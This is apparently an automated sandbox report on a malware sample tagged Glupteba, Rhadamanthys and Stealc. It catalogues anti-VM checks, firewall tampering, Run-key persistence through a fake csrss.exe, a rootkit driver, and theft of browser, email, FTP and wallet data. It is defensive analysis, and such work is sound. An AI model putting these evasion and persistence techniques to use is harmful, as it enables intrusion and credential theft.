Malware Analysis Report

2024-11-30 02:16

Sample ID 240328-rn3x7ahd29
Target 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
SHA256 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
Tags
glupteba rhadamanthys stealc discovery dropper evasion loader persistence rootkit spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d

Threat Level: Known bad

The file 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d was found to be: Known bad.

Malicious Activity Summary

glupteba rhadamanthys stealc discovery dropper evasion loader persistence rootkit spyware stealer themida trojan upx

Glupteba payload

Rhadamanthys

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies firewall policy service

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of local email clients

Drops startup file

Themida packer

Checks BIOS information in registry

Reads user/profile data of web browsers

Loads dropped DLL

Reads data files stored by FTP clients

Checks computer location settings

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Adds Run key to start application

Checks whether UAC is enabled

Drops Chrome extension

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Enumerates physical storage devices

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Uses Task Scheduler COM API

Runs ping.exe

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-28 14:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-28 14:21

Reported

2024-03-28 14:23

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

145s

Command Line

sihost.exe

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Rhadamanthys

stealer rhadamanthys

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5084 created 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\system32\sihost.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6C5vrw9HlmBbodwnSru7JCve.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nq6HrOPNQV3AaiTZ2ENszitk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zdUBOSEBG9eSDmyFgN1uKQWG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwi2TsGcdAGdwOcS1B3eh5H5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rfMtcSilGcz9WSg5R9vEYI1Y.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26ZY1zErGGTZoLBKBy5Lpa8v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M67GjMBrsbsHZTc6qTnNvMHQ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8iwRl3OdyFG6LeZYMrXZXLBc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sb771El5hpTNkkzOaJIpPwPM.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QPMwbWVY1JbuAE8Mag8boWCx.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYaLwPfN6vuiz6R1FwtbMxQK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe N/A
N/A N/A C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\NhgXboc.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\gvVUloZ.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\cqdpDDd.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\amDviS.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\ZadmzDkveihSi.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
